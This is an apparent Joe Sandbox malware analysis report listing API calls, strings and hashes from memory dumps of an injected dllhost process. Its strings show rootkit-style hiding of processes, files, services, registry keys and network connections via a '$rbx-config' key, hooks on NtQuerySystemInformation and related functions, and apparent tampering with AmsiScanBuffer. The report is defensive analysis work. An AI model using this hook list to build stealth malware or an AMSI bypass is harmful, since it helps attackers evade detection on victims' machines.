lstrlenW.KERNEL32 ref: 0000025DC1CE32BE

Part of subcall function 0000025DC1CE1A30: OpenProcess.KERNEL32 ref: 0000025DC1CE1A56
Part of subcall function 0000025DC1CE1A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000025DC1CE1A74
Part of subcall function 0000025DC1CE1A30: PathFindFileNameW.SHLWAPI ref: 0000025DC1CE1A83
Part of subcall function 0000025DC1CE1A30: lstrlenW.KERNEL32 ref: 0000025DC1CE1A8F
Part of subcall function 0000025DC1CE1A30: StrCpyW.SHLWAPI ref: 0000025DC1CE1AA2
Part of subcall function 0000025DC1CE1A30: CloseHandle.KERNEL32 ref: 0000025DC1CE1AB0

GetProcAddress.KERNEL32 ref: 0000025DC1CE30A9

Part of subcall function 0000025DC1CE3F88: StrCmpNIW.SHLWAPI(?,?,?,0000025DC1CE272F), ref: 0000025DC1CE3FA0

StrCmpNIW.SHLWAPI ref: 0000025DC1CE30EC
lstrlenW.KERNEL32 ref: 0000025DC1CE3214

Strings

NtQueryObject, xrefs: 0000025DC1CE309F
ntdll.dll, xrefs: 0000025DC1CE308D
\Device\Nsi, xrefs: 0000025DC1CE30DF

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 4fdab0edebb16473f97836fbf6e65ccfbe938ce41d716432743d95a74e8e48e4
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 07B17162210EA082EB758FA5DE08799E3A4FB64B87F44A017FE5993795DF35DC80C348

Function 0000025DC1AC84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000025DC1AC84CC
RtlCaptureContext.NTDLL ref: 0000025DC1AC84F9
RtlLookupFunctionEntry.NTDLL ref: 0000025DC1AC8513
RtlVirtualUnwind.NTDLL ref: 0000025DC1AC8554
IsDebuggerPresent.KERNEL32 ref: 0000025DC1AC85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025DC1AC85C5
UnhandledExceptionFilter.KERNEL32 ref: 0000025DC1AC85D0

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: eab925b8db7be042323af02dabb2e17104d139f60eebe8b079ffa808d64cfcd9
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 6E317772201F908AEB74DFA0E8543EE7360F7A470AF44402ADA4E87B98DF78C249C714

Function 0000025DC1CE84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000025DC1CE84CC
RtlCaptureContext.NTDLL ref: 0000025DC1CE84F9
RtlLookupFunctionEntry.NTDLL ref: 0000025DC1CE8513
RtlVirtualUnwind.NTDLL ref: 0000025DC1CE8554
IsDebuggerPresent.KERNEL32 ref: 0000025DC1CE85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025DC1CE85C5
UnhandledExceptionFilter.KERNEL32 ref: 0000025DC1CE85D0

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 83cbbca286ca62bde8096ab7b6b9cf10f8221cc2ed5c07a395f6cce9025682e1
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 6F314976205F9086EB708FA0E8943EDB360F794746F44402AEB4E87B98DF38C548C718

Function 0000025DC1ACCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000025DC1ACCE0B
RtlLookupFunctionEntry.NTDLL ref: 0000025DC1ACCE23
RtlVirtualUnwind.NTDLL ref: 0000025DC1ACCE5E
IsDebuggerPresent.KERNEL32 ref: 0000025DC1ACCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025DC1ACCEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000025DC1ACCEAC

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 74c50a65dfb7096de3d7d2378d1de0dcaed5e48340783c342c8781aafb939fc3
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 43418E36214F9086EB70DF64EC5839E73A4F798766F500126EA8D87B99DF38C15ACB04

Function 0000025DC1CECD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000025DC1CECE0B
RtlLookupFunctionEntry.NTDLL ref: 0000025DC1CECE23
RtlVirtualUnwind.NTDLL ref: 0000025DC1CECE5E
IsDebuggerPresent.KERNEL32 ref: 0000025DC1CECE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025DC1CECEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000025DC1CECEAC

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: a0eb815f1645407df5eaf6ef232f9ad91eca7a63f57af4064715022487a6fd21
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: B3417C36214F9086EB60CF64E84439EB3A4F798756F500216FB9D87B98DF38C195CB08

Function 0000025DC1ACDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000025DC1ACDB99
FindNextFileW.KERNEL32 ref: 0000025DC1ACDCCF
FindClose.KERNEL32 ref: 0000025DC1ACDD0F
FindClose.KERNEL32 ref: 0000025DC1ACDD3B

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 415b27e767e8cb02b2fc5937833541e7161f71f4f48a938405091388ba5c12af
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 67A11622704FB049FF31DBB5DCA83AD6BA1A7A1797F044117DA48AB799DA35C043C748

Function 0000025DC1CEDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000025DC1CEDB99
FindNextFileW.KERNEL32 ref: 0000025DC1CEDCCF
FindClose.KERNEL32 ref: 0000025DC1CEDD0F
FindClose.KERNEL32 ref: 0000025DC1CEDD3B

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 60636663b88ace548b3dc5ff08e8c71e19d3032f16e37f1615a4d3afeeb9f41b
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 9BA12A22714EA049FB30DBB5EE483BDABA0FB51797F144116FE59A7A95DA34C4C1C308

Function 0000025DC1AC1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1AC172F
HeapAlloc.KERNEL32 ref: 0000025DC1AC173E

Part of subcall function 0000025DC1AC1264: GetProcessHeap.KERNEL32 ref: 0000025DC1AC126A
Part of subcall function 0000025DC1AC1264: HeapAlloc.KERNEL32 ref: 0000025DC1AC1279
Part of subcall function 0000025DC1AC1264: GetProcessHeap.KERNEL32 ref: 0000025DC1AC1293
Part of subcall function 0000025DC1AC1264: HeapAlloc.KERNEL32 ref: 0000025DC1AC12A4

Part of subcall function 0000025DC1AC1000: GetProcessHeap.KERNEL32 ref: 0000025DC1AC1006
Part of subcall function 0000025DC1AC1000: HeapAlloc.KERNEL32 ref: 0000025DC1AC1015
Part of subcall function 0000025DC1AC1000: GetProcessHeap.KERNEL32 ref: 0000025DC1AC1028
Part of subcall function 0000025DC1AC1000: HeapAlloc.KERNEL32 ref: 0000025DC1AC1037

RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC17AE
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC17DB
RegCloseKey.ADVAPI32 ref: 0000025DC1AC17F5
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC1815
RegCloseKey.ADVAPI32 ref: 0000025DC1AC1830
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC1850
RegCloseKey.ADVAPI32 ref: 0000025DC1AC186B
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC188B
RegCloseKey.ADVAPI32 ref: 0000025DC1AC18A6
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC18C6
RegCloseKey.ADVAPI32 ref: 0000025DC1AC18E1
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC1901
RegCloseKey.ADVAPI32 ref: 0000025DC1AC191C
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC193C
RegCloseKey.ADVAPI32 ref: 0000025DC1AC1957
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1AC1977
RegCloseKey.ADVAPI32 ref: 0000025DC1AC1992
RegCloseKey.ADVAPI32 ref: 0000025DC1AC199C

Part of subcall function 0000025DC1AC12B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000025DC1AC1315
Part of subcall function 0000025DC1AC12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1AC1323
Part of subcall function 0000025DC1AC12B8: HeapAlloc.KERNEL32 ref: 0000025DC1AC1334
Part of subcall function 0000025DC1AC12B8: RegEnumValueW.ADVAPI32 ref: 0000025DC1AC1393
Part of subcall function 0000025DC1AC12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1AC13DB
Part of subcall function 0000025DC1AC12B8: HeapAlloc.KERNEL32 ref: 0000025DC1AC13E9
Part of subcall function 0000025DC1AC12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1AC1406
Part of subcall function 0000025DC1AC12B8: HeapFree.KERNEL32 ref: 0000025DC1AC1414
Part of subcall function 0000025DC1AC12B8: lstrlenW.KERNEL32 ref: 0000025DC1AC141D
Part of subcall function 0000025DC1AC12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1AC142B
Part of subcall function 0000025DC1AC12B8: HeapAlloc.KERNEL32 ref: 0000025DC1AC1439

Strings

process_names, xrefs: 0000025DC1AC1849
pid, xrefs: 0000025DC1AC180E
service_names, xrefs: 0000025DC1AC18BF
tcp_local, xrefs: 0000025DC1AC18FA
tcp_remote, xrefs: 0000025DC1AC1935
udp, xrefs: 0000025DC1AC1970
SOFTWARE\$rbx-config, xrefs: 0000025DC1AC178E
startup, xrefs: 0000025DC1AC17D1
paths, xrefs: 0000025DC1AC1884

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 2301f58260b5f50a0bfdd5748d58a17c8cee787488d04f2ca4aedc0eb915ae30
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 26710C36310F60C5EB20EFA5EC6869923B4FBA5B9BF405122DD4E97768DE35C446C344

Function 0000025DC1CE1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1CE172F
HeapAlloc.KERNEL32 ref: 0000025DC1CE173E

Part of subcall function 0000025DC1CE1264: GetProcessHeap.KERNEL32 ref: 0000025DC1CE126A
Part of subcall function 0000025DC1CE1264: HeapAlloc.KERNEL32 ref: 0000025DC1CE1279
Part of subcall function 0000025DC1CE1264: GetProcessHeap.KERNEL32 ref: 0000025DC1CE1293
Part of subcall function 0000025DC1CE1264: HeapAlloc.KERNEL32 ref: 0000025DC1CE12A4

Part of subcall function 0000025DC1CE1000: GetProcessHeap.KERNEL32 ref: 0000025DC1CE1006
Part of subcall function 0000025DC1CE1000: HeapAlloc.KERNEL32 ref: 0000025DC1CE1015
Part of subcall function 0000025DC1CE1000: GetProcessHeap.KERNEL32 ref: 0000025DC1CE1028
Part of subcall function 0000025DC1CE1000: HeapAlloc.KERNEL32 ref: 0000025DC1CE1037

RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE17AE
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE17DB
RegCloseKey.ADVAPI32 ref: 0000025DC1CE17F5
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE1815
RegCloseKey.ADVAPI32 ref: 0000025DC1CE1830
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE1850
RegCloseKey.ADVAPI32 ref: 0000025DC1CE186B
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE188B
RegCloseKey.ADVAPI32 ref: 0000025DC1CE18A6
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE18C6
RegCloseKey.ADVAPI32 ref: 0000025DC1CE18E1
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE1901
RegCloseKey.ADVAPI32 ref: 0000025DC1CE191C
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE193C
RegCloseKey.ADVAPI32 ref: 0000025DC1CE1957
RegOpenKeyExW.ADVAPI32 ref: 0000025DC1CE1977
RegCloseKey.ADVAPI32 ref: 0000025DC1CE1992
RegCloseKey.ADVAPI32 ref: 0000025DC1CE199C

Part of subcall function 0000025DC1CE12B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000025DC1CE1315
Part of subcall function 0000025DC1CE12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1CE1323
Part of subcall function 0000025DC1CE12B8: HeapAlloc.KERNEL32 ref: 0000025DC1CE1334
Part of subcall function 0000025DC1CE12B8: RegEnumValueW.ADVAPI32 ref: 0000025DC1CE1393
Part of subcall function 0000025DC1CE12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1CE13DB
Part of subcall function 0000025DC1CE12B8: HeapAlloc.KERNEL32 ref: 0000025DC1CE13E9
Part of subcall function 0000025DC1CE12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1CE1406
Part of subcall function 0000025DC1CE12B8: HeapFree.KERNEL32 ref: 0000025DC1CE1414
Part of subcall function 0000025DC1CE12B8: lstrlenW.KERNEL32 ref: 0000025DC1CE141D
Part of subcall function 0000025DC1CE12B8: GetProcessHeap.KERNEL32 ref: 0000025DC1CE142B
Part of subcall function 0000025DC1CE12B8: HeapAlloc.KERNEL32 ref: 0000025DC1CE1439

Strings

service_names, xrefs: 0000025DC1CE18BF
process_names, xrefs: 0000025DC1CE1849
tcp_local, xrefs: 0000025DC1CE18FA
udp, xrefs: 0000025DC1CE1970
startup, xrefs: 0000025DC1CE17D1
tcp_remote, xrefs: 0000025DC1CE1935
SOFTWARE\$rbx-config, xrefs: 0000025DC1CE178E
paths, xrefs: 0000025DC1CE1884
pid, xrefs: 0000025DC1CE180E

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 800ed405e8ef8e60c1664eedeb0737d88bb794ad1cd59c5aeadee18ef5627814
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 53712B26310E60C5EB30DFA1ED58A98A3A4FBA5B8BF401112FE4D87B28DE34C494C348

Function 0000025DC1AC1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000025DC1AC1E7F

Part of subcall function 0000025DC1AC22A8: GetModuleHandleA.KERNEL32(?,?,?,0000025DC1AC1EB1), ref: 0000025DC1AC22C0
Part of subcall function 0000025DC1AC22A8: GetProcAddress.KERNEL32(?,?,?,0000025DC1AC1EB1), ref: 0000025DC1AC22D1

CreateThread.KERNEL32 ref: 0000025DC1AC2043
TlsAlloc.KERNEL32 ref: 0000025DC1AC2049
TlsAlloc.KERNEL32 ref: 0000025DC1AC2055
TlsAlloc.KERNEL32 ref: 0000025DC1AC2061
TlsAlloc.KERNEL32 ref: 0000025DC1AC206D
TlsAlloc.KERNEL32 ref: 0000025DC1AC2079
TlsAlloc.KERNEL32 ref: 0000025DC1AC2085

Strings

sechost.dll, xrefs: 0000025DC1AC1F99
NtResumeThread, xrefs: 0000025DC1AC1EC2
AmsiScanBuffer, xrefs: 0000025DC1AC2012
NtEnumerateKey, xrefs: 0000025DC1AC1F19
NtQuerySystemInformation, xrefs: 0000025DC1AC1EA5
NtQueryDirectoryFile, xrefs: 0000025DC1AC1EDF
EnumServicesStatusExW, xrefs: 0000025DC1AC1F71, 0000025DC1AC1F92
PdhGetRawCounterArrayW, xrefs: 0000025DC1AC1FD0
NtDeviceIoControlFile, xrefs: 0000025DC1AC1FB6
NtEnumerateValueKey, xrefs: 0000025DC1AC1F36
amsi.dll, xrefs: 0000025DC1AC2019
EnumServiceGroupW, xrefs: 0000025DC1AC1F50
NtQueryDirectoryFileEx, xrefs: 0000025DC1AC1EFC
ntdll.dll, xrefs: 0000025DC1AC1E8D
pdh.dll, xrefs: 0000025DC1AC1FD7, 0000025DC1AC1FF8
PdhGetFormattedCounterArrayW, xrefs: 0000025DC1AC1FF1
advapi32.dll, xrefs: 0000025DC1AC1F57, 0000025DC1AC1F78

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 9857d0208ba78696633db9295b126366081488b252f9a7802abd2586bd043610
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: AD517DA0110F7AA5EB20EBE8EC6C7E42361BBB1747F804517D409D3369DE79826BC348

Function 0000025DC1CE1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000025DC1CE1E7F

Part of subcall function 0000025DC1CE22A8: GetModuleHandleA.KERNEL32(?,?,?,0000025DC1CE1EB1), ref: 0000025DC1CE22C0
Part of subcall function 0000025DC1CE22A8: GetProcAddress.KERNEL32(?,?,?,0000025DC1CE1EB1), ref: 0000025DC1CE22D1

CreateThread.KERNEL32 ref: 0000025DC1CE2043
TlsAlloc.KERNEL32 ref: 0000025DC1CE2049
TlsAlloc.KERNEL32 ref: 0000025DC1CE2055
TlsAlloc.KERNEL32 ref: 0000025DC1CE2061
TlsAlloc.KERNEL32 ref: 0000025DC1CE206D
TlsAlloc.KERNEL32 ref: 0000025DC1CE2079
TlsAlloc.KERNEL32 ref: 0000025DC1CE2085

Strings

amsi.dll, xrefs: 0000025DC1CE2019
NtDeviceIoControlFile, xrefs: 0000025DC1CE1FB6
advapi32.dll, xrefs: 0000025DC1CE1F57, 0000025DC1CE1F78
ntdll.dll, xrefs: 0000025DC1CE1E8D
NtQuerySystemInformation, xrefs: 0000025DC1CE1EA5
NtQueryDirectoryFile, xrefs: 0000025DC1CE1EDF
NtEnumerateValueKey, xrefs: 0000025DC1CE1F36
NtQueryDirectoryFileEx, xrefs: 0000025DC1CE1EFC
EnumServiceGroupW, xrefs: 0000025DC1CE1F50
NtEnumerateKey, xrefs: 0000025DC1CE1F19
EnumServicesStatusExW, xrefs: 0000025DC1CE1F71, 0000025DC1CE1F92
PdhGetFormattedCounterArrayW, xrefs: 0000025DC1CE1FF1
sechost.dll, xrefs: 0000025DC1CE1F99
AmsiScanBuffer, xrefs: 0000025DC1CE2012
pdh.dll, xrefs: 0000025DC1CE1FD7, 0000025DC1CE1FF8
